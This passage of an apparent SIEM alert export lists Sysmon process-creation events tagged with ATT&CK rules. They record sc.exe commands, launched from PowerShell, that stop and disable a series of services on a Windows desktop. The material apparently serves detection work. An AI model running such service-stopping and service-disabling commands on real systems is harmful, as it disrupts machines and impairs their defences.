Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.519",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.325 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010182e2e00} +ProcessId: 7276 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.328100100Z"",""eventRecordID"":""3398"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.325\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010182e2e00}\r\nProcessId: 7276\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.325"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010182e2e00}"",""processId"":""7276"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.471",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.254 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00100a2b2e00} +ProcessId: 2492 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.256745400Z"",""eventRecordID"":""3395"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.254\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00100a2b2e00}\r\nProcessId: 2492\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.254"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00100a2b2e00}"",""processId"":""2492"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.406",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.171 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001039282e00} +ProcessId: 5056 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.175408800Z"",""eventRecordID"":""3392"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.171\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001039282e00}\r\nProcessId: 5056\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.171"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001039282e00}"",""processId"":""5056"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.390",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.143 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001057272e00} +ProcessId: 2496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Natimmonal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.145336800Z"",""eventRecordID"":""3391"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.143\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001057272e00}\r\nProcessId: 2496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.143"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001057272e00}"",""processId"":""2496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Natimmonal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.359",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.109 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010ad252e00} +ProcessId: 3664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.111465200Z"",""eventRecordID"":""3389"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.109\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010ad252e00}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.109"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010ad252e00}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:27.316",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.068 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001017232e00} +ProcessId: 380 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.070372300Z"",""eventRecordID"":""3386"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.068\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001017232e00}\r\nProcessId: 380\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.068"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001017232e00}"",""processId"":""380"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.984",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.041 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001055212e00} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System 